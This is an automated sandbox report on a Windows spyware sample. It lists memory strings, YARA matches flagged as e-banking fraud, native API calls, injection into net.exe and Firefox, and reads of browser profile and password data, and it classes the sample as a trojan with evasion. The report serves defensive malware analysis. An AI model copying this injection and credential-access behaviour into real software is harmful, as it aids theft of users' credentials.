                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/zoeken/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/privacy-policy/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/100000230
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/question/110000577/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/services/search-domains/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/terms-of-service/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/algemene-voorwaarden/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/knowledgebase/zoeken/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/privacy-policy/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Gd3lOevK672JYIK.zip.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2639564643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2697225116.0000000005DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4655930930.0000000004B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4647930046.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4653755949.0000000004880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2641308327.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4645931849.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.4643912101.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0042C713 NtClose,4_2_0042C713
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882B60 NtClose,LdrInitializeThunk,4_2_01882B60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01882DF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01882C70
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018835C0 NtCreateMutant,LdrInitializeThunk,4_2_018835C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01884340 NtSetContextThread,4_2_01884340
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01884650 NtSuspendThread,4_2_01884650
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882B80 NtQueryInformationFile,4_2_01882B80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BA0 NtEnumerateValueKey,4_2_01882BA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BE0 NtQueryValueKey,4_2_01882BE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882BF0 NtAllocateVirtualMemory,4_2_01882BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AB0 NtWaitForSingleObject,4_2_01882AB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AD0 NtReadFile,4_2_01882AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882AF0 NtWriteFile,4_2_01882AF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DB0 NtEnumerateKey,4_2_01882DB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882DD0 NtDelayExecution,4_2_01882DD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D00 NtSetInformationFile,4_2_01882D00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D10 NtMapViewOfSection,4_2_01882D10
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882D30 NtUnmapViewOfSection,4_2_01882D30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CA0 NtQueryInformationToken,4_2_01882CA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CC0 NtQueryVirtualMemory,4_2_01882CC0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882CF0 NtOpenProcess,4_2_01882CF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C00 NtQueryInformationProcess,4_2_01882C00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882C60 NtCreateKey,4_2_01882C60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F90 NtProtectVirtualMemory,4_2_01882F90
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FA0 NtQuerySection,4_2_01882FA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FB0 NtResumeThread,4_2_01882FB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882FE0 NtCreateFile,4_2_01882FE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F30 NtCreateSection,4_2_01882F30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882F60 NtCreateProcessEx,4_2_01882F60
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882E80 NtReadVirtualMemory,4_2_01882E80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882EA0 NtAdjustPrivilegesToken,4_2_01882EA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882EE0 NtQueueApcThread,4_2_01882EE0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01882E30 NtWriteVirtualMemory,4_2_01882E30
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883090 NtSetValueKey,4_2_01883090
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883010 NtOpenDirectoryObject,4_2_01883010
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018839B0 NtGetContextThread,4_2_018839B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883D10 NtOpenProcessToken,4_2_01883D10
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01883D70 NtOpenThread,4_2_01883D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03094340 NtSetContextThread,LdrInitializeThunk,11_2_03094340
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03094650 NtSuspendThread,LdrInitializeThunk,11_2_03094650
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092B60 NtClose,LdrInitializeThunk,11_2_03092B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03092BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03092BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03092BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092AD0 NtReadFile,LdrInitializeThunk,11_2_03092AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03092AF0 NtWriteFile,LdrInitializeThunk,11_2_03092AF0
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_030935C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_030939B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03092CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03093010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03093090 NtSetValueKey
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03093D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_03093D70 NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_02829270 NtCreateFile
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_028293D0 NtReadFile
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_028296D0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_028294C0 NtDeleteFile
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_02829560 NtClose
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_02E7F7E7 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\net.exe Code function: 11_2_02E7F9EE NtSetContextThread
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030DF290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03095130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030A7E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0304B970 appears 280 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 018CF290 appears 105 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 01885130 appears 58 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 018BEA12 appears 86 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 0183B970 appears 280 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 01897E54 appears 111 times
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000002.2210832795.000000000A240000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000002.2202951824.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000000.2181381370.00000000007E0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePRRd.exeD vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.0000000001314000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenet.exej% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.000000000193D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenet.exej% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe | Binary or memory string: OriginalFilenamePRRd.exeD vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@14/9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Gd3lOevK672JYIK.zip.exe.log
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\net.exe | File created: C:\Users\user\AppData\Local\Temp\35859UlfLq
                Source: Gd3lOevK672JYIK.zip.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Gd3lOevK672JYIK.zip.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: net.exe, 0000000B.00000002.4649724687.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4649724687.0000000002C46000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4649724687.0000000002C74000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2826936403.0000000002C46000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Gd3lOevK672JYIK.zip.exe | Virustotal: Detection: 38%
                Source: Gd3lOevK672JYIK.zip.exe | ReversingLabs: Detection: 39%
                Source: unknown | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Process created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
